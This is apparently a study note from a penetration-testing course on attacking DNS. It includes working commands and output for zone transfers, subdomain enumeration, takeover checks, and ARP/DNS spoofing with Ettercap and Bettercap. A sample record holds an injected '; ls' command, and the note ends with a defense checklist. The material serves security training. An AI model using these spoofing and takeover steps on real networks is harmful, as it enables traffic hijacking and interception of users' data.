πDNS Attacks
π― Overview
This document covers exploitation techniques against DNS services, focusing on practical attack methodologies from HTB Academy's "Attacking Common Services" module. DNS attacks can lead to information disclosure, domain takeover, traffic redirection, and man-in-the-middle attacks.
"The Domain Name System (DNS) translates domain names (e.g., hackthebox.com) to the numerical IP addresses (e.g., 104.17.42.72). Since nearly all network applications use DNS, attacks against DNS servers represent one of the most prevalent and significant threats today."
ποΈ DNS Attack Methodology
Attack Chain Overview
Service Discovery β Zone Transfer Exploitation β Subdomain Enumeration β Domain Takeover β DNS SpoofingKey Attack Objectives
DNS zone transfers for information gathering
Subdomain enumeration to expand attack surface
Domain/subdomain takeover for content control
DNS cache poisoning for traffic redirection
DNS spoofing for man-in-the-middle attacks
π Service Discovery & Enumeration
Default DNS Port Detection
# Default DNS ports: UDP/53, TCP/53
# HTB Academy enumeration example
nmap -p53 -Pn -sV -sC 10.10.110.213
# Expected output
PORT STATE SERVICE VERSION
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)Comprehensive DNS Scanning
# Full DNS service enumeration
nmap -p53 -sU -sV --script dns-* 10.10.110.213
# DNS version detection
nmap -p53 --script dns-nsid 10.10.110.213
# DNS recursion check
nmap -p53 --script dns-recursion 10.10.110.213Key Information to Extract
DNS server software (BIND, Microsoft DNS, etc.)
Version information for vulnerability research
Zone information (SOA records)
Recursion capabilities
DNS security features (DNSSEC status)
ποΈ DNS Zone Transfer Attacks
Understanding Zone Transfers
DNS Zone Transfer = Copy of DNS database from one server to another
Default behavior: No authentication required
Risk: Complete DNS namespace disclosure
Protocol: Uses TCP/53 for reliable transmissionHTB Academy Zone Transfer Example
Using DIG for AXFR
# HTB Academy zone transfer attack
dig AXFR @ns1.inlanefreight.htb inlanefreight.htb
# Expected successful output
; <<>> DiG 9.11.5-P1-1-Debian <<>> axfr inlanefrieght.htb @10.129.110.213
;; global options: +cmd
inlanefrieght.htb. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
inlanefrieght.htb. 604800 IN AAAA ::1
inlanefrieght.htb. 604800 IN NS localhost.
inlanefrieght.htb. 604800 IN A 10.129.110.22
admin.inlanefrieght.htb. 604800 IN A 10.129.110.21
hr.inlanefrieght.htb. 604800 IN A 10.129.110.25
support.inlanefrieght.htb. 604800 IN A 10.129.110.28
inlanefrieght.htb. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 28 msec
;; SERVER: 10.129.110.213#53(10.129.110.213)
;; WHEN: Mon Oct 11 17:20:13 EDT 2020
;; XFR size: 8 records (messages 1, bytes 289)Alternative Zone Transfer Methods
# Using nslookup
nslookup
> server ns1.inlanefreight.htb
> set type=any
> ls -d inlanefreight.htb
# Using host command
host -t axfr inlanefreight.htb ns1.inlanefreight.htb
# Using dnsrecon
dnsrecon -d inlanefreight.htb -t axfrFierce for Comprehensive DNS Analysis
# HTB Academy Fierce example
fierce --domain zonetransfer.me
# Expected rich output
NS: nsztm2.digi.ninja. nsztm1.digi.ninja.
SOA: nsztm1.digi.ninja. (81.4.108.41)
Zone: success
{<DNS name @>: '@ 7200 IN SOA nsztm1.digi.ninja. robin.digi.ninja. 2019100801 '
'172800 900 1209600 3600\n'
'@ 300 IN HINFO "Casio fx-700G" "Windows XP"\n'
'@ 301 IN TXT '
'"google-site-verification=tyP28J7JAUHA9fw2sHXMgcCC0I6XBmmoVi04VlMewxA"\n'
'@ 7200 IN MX 0 ASPMX.L.GOOGLE.COM.\n'
<DNS name _acme-challenge>: '_acme-challenge 301 IN TXT '
'"6Oa05hbUJ9xSsvYy7pApQvwCUSSGgxvrbdizjePEsZI"',
<DNS name cmdexec>: 'cmdexec 300 IN TXT "; ls"',
<DNS name contact>: 'contact 2592000 IN TXT "Remember to call or email Pippa '
'on +44 123 4567890 or pippa@zonetransfer.me when making '
'DNS changes"',
<DNS name email>: 'email 2222 IN NAPTR 1 1 "P" "E2U+email" "" '
'email.zonetransfer.me\n'
'email 7200 IN A 74.125.206.26',π Subdomain Enumeration & Domain Takeover
Subdomain Discovery Techniques
HTB Academy Subfinder Example
# Subdomain enumeration with Subfinder
./subfinder -d inlanefreight.com -v
# Expected output
_ __ _ _
____ _| |__ / _(_)_ _ __| |___ _ _
(_-< || | '_ \ _| | ' \/ _ / -_) '_|
/__/\_,_|_.__/_| |_|_||_\__,_\___|_| v2.4.5
projectdiscovery.io
[INF] Enumerating subdomains for inlanefreight.com
[alienvault] www.inlanefreight.com
[dnsdumpster] ns1.inlanefreight.com
[dnsdumpster] ns2.inlanefreight.com
[bufferover] support.inlanefreight.com
[INF] Found 4 subdomains for inlanefreight.com in 20 seconds 11 millisecondsSubbrute for Internal Networks
# HTB Academy Subbrute setup for internal use
git clone https://github.com/TheRook/subbrute.git
cd subbrute
echo "ns1.inlanefreight.com" > ./resolvers.txt
# DNS brute-forcing with custom resolvers
./subbrute inlanefreight.com -s ./names.txt -r ./resolvers.txt
# Output shows discovered subdomains
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
inlanefreight.com
ns2.inlanefreight.com
www.inlanefreight.com
ms1.inlanefreight.com
support.inlanefreight.comDomain Takeover Attacks
Understanding Subdomain Takeover
CNAME Record: sub.target.com β anotherdomain.com
Risk: If anotherdomain.com expires and is re-registered
Result: Attacker controls sub.target.com content
Common Targets: AWS S3, GitHub Pages, Heroku, FastlyHTB Academy Takeover Example
# Check for vulnerable CNAME records
host support.inlanefreight.com
# Vulnerable response
support.inlanefreight.com is an alias for inlanefreight.s3.amazonaws.com
# Test for takeover vulnerability
curl https://support.inlanefreight.com
# Error indicating potential takeover
<Error>
<Code>NoSuchBucket</Code>
<Message>The specified bucket 'inlanefreight' does not exist</Message>
</Error>Subdomain Takeover Detection Tools
# Using SubOver
python3 subover.py -l subdomains.txt
# Using can-i-take-over-xyz repository guidelines
# Check: https://github.com/EdOverflow/can-i-take-over-xyz
# Common vulnerable services:
# - AWS S3 buckets
# - GitHub Pages
# - Heroku apps
# - Azure websites
# - Fastly CDNπ·οΈ DNS Spoofing & Cache Poisoning
Understanding DNS Cache Poisoning
Goal: Alter legitimate DNS records with false information
Methods:
1. MITM attacks intercepting DNS traffic
2. DNS server vulnerabilities exploitation
3. Local network cache poisoning
Result: Traffic redirection to malicious serversHTB Academy Ettercap DNS Spoofing
Step 1: Configure DNS Spoofing
# Edit Ettercap DNS configuration
cat /etc/ettercap/etter.dns
# Add spoofing entries
inlanefreight.com A 192.168.225.110
*.inlanefreight.com A 192.168.225.110Step 2: Execute MITM Attack
# Launch Ettercap GUI
ettercap -G
# Steps in Ettercap:
# 1. Hosts > Scan for Hosts
# 2. Add target IP (192.168.152.129) to Target1
# 3. Add gateway IP (192.168.152.2) to Target2
# 4. Plugins > Manage Plugins > dns_spoofStep 3: Verify DNS Spoofing
# From victim machine (192.168.152.129)
C:\>ping inlanefreight.com
Pinging inlanefreight.com [192.168.225.110] with 32 bytes of data:
Reply from 192.168.225.110: bytes=32 time<1ms TTL=64
Reply from 192.168.225.110: bytes=32 time<1ms TTL=64
# Browser test shows fake page hosted on 192.168.225.110Alternative DNS Spoofing Tools
# Using Bettercap
bettercap -iface eth0
# Bettercap commands
> set dns.spoof.domains inlanefreight.com
> set dns.spoof.address 192.168.225.110
> dns.spoof on
> arp.spoof on
# Using dnsmasq for local spoofing
echo "192.168.225.110 inlanefreight.com" >> /etc/dnsmasq_spoof.conf
dnsmasq --conf-file=/etc/dnsmasq_spoof.confπ― HTB Academy Lab Scenarios
Scenario 1: DNS Zone Transfer Exploitation
Task: Find all DNS records for "inlanefreight.htb" domain and submit flag found as DNS record
HTB Academy Solution Workflow
Step 1: Setup Subbrute Tool
# Clone subbrute repository
git clone https://github.com/TheRook/subbrute.git && cd subbrute/
# Expected output
Cloning into 'subbrute'...
remote: Enumerating objects: 438, done.
remote: Total 438 (delta 0), reused 0 (delta 0), pack-reused 438
Receiving objects: 100% (438/438), 11.85 MiB | 20.67 MiB/s, done.
Resolving deltas: 100% (216/216), done.Step 2: Configure DNS Resolver
# Add target DNS server IP to resolvers file
echo STMIP > resolvers.txt
# Replace STMIP with actual target IP (e.g., 10.129.137.154)Step 3: Subdomain Enumeration
# Use subbrute with SecLists wordlist
python3 subbrute.py inlanefreight.htb -s /opt/useful/SecLists/Discovery/DNS/namelist.txt -r resolvers.txt
# Expected output
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
inlanefreight.htb
helpdesk.inlanefreight.htb
hr.inlanefreight.htb
ns.inlanefreight.htbStep 4: Zone Transfer on Discovered Subdomains
# Perform zone transfer on hr subdomain and search for TXT records
dig axfr hr.inlanefreight.htb @10.129.137.154 | grep "TXT"
# Successful flag extraction
hr.inlanefreight.htb. 604800 IN TXT "HTB{...}"Alternative Methods
# Method 1: Direct zone transfer
dig AXFR @target_dns_server inlanefreight.htb
# Method 2: Using fierce
fierce --domain inlanefreight.htb
# Method 3: Using dnsrecon
dnsrecon -d inlanefreight.htb -t axfr
# Method 4: Check all discovered subdomains
for sub in helpdesk hr ns; do
echo "=== Checking $sub.inlanefreight.htb ==="
dig AXFR @target_dns_server $sub.inlanefreight.htb
doneAdvanced DNS Reconnaissance
# Enumerate all record types
dig ANY @target_dns_server inlanefreight.htb
# Check for specific record types
dig TXT @target_dns_server inlanefreight.htb
dig MX @target_dns_server inlanefreight.htb
dig NS @target_dns_server inlanefreight.htb
dig PTR @target_dns_server inlanefreight.htb
# Brute force subdomains
gobuster dns -d inlanefreight.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
# Check for zone transfer on discovered subdomains
for sub in $(cat discovered_subdomains.txt); do
dig AXFR @target_dns_server $sub.inlanefreight.htb
doneπ DNS Attack Checklist
Discovery & Enumeration
Information Gathering
Exploitation Techniques
Post-Exploitation
π‘οΈ Defense & Mitigation
DNS Server Hardening
Disable zone transfers - Restrict AXFR to authorized servers only
Enable DNSSEC - Cryptographic DNS response validation
Implement access controls - IP-based query restrictions
Regular updates - Patch DNS server software
Rate limiting - Prevent DNS amplification attacks
Network Security
DNS filtering - Block malicious domains
Encrypted DNS - DNS over HTTPS (DoH) or DNS over TLS (DoT)
Split DNS - Separate internal and external DNS
DNS monitoring - Unusual query pattern detection
Cache poisoning protection - Source port randomization
Monitoring & Detection
Zone transfer attempts - Log AXFR queries
Unusual DNS queries - Detect reconnaissance patterns
DNS response validation - Monitor for spoofed responses
Subdomain monitoring - Track new subdomain creation
Certificate transparency - Monitor SSL certificate logs
π Related Techniques
Subdomain Enumeration - Information gathering techniques
Domain Hijacking - Web-based domain attacks
Man-in-the-Middle - Traffic interception
Social Engineering - Phishing with spoofed domains
Network Pivoting - Internal network access
π References
HTB Academy - Attacking Common Services Module
RFC 1035 - Domain Names Implementation and Specification
OWASP DNS Security - DNS attack vectors and mitigations
Subfinder Documentation - Subdomain discovery tool
Ettercap Manual - MITM attack framework
can-i-take-over-xyz - Subdomain takeover reference
This document provides comprehensive DNS attack methodologies based on HTB Academy's "Attacking Common Services" module, focusing on practical exploitation techniques for penetration testing and security assessment.
Last updated